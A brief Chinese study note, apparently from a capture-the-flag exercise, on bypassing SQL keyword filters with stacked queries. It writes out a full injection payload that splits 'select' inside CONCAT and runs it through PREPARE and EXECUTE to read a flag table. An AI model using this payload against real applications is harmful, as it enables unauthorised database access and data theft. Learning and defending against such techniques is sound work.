预编译拼接字符法
标签(空格分隔): SQL绕过
直接concat函数来进行一个拼接字符串的方法
语法
1
2
3
4
5
6
7
8
9
| -1'; // 结束前面的查询语句
set @sql = CONCAT('sele','ct flag from `1919810931114514`;');
//将关键字拆分(比如select拆成'sele'+'ct')来绕过简单的关键字过滤
prepare stmt from @sql; // 准备预处理语句
EXECUTE stmt; // 执行预处理语句
#
//注释掉原查询剩余部分
|
https://xz.aliyun.com/news/90960
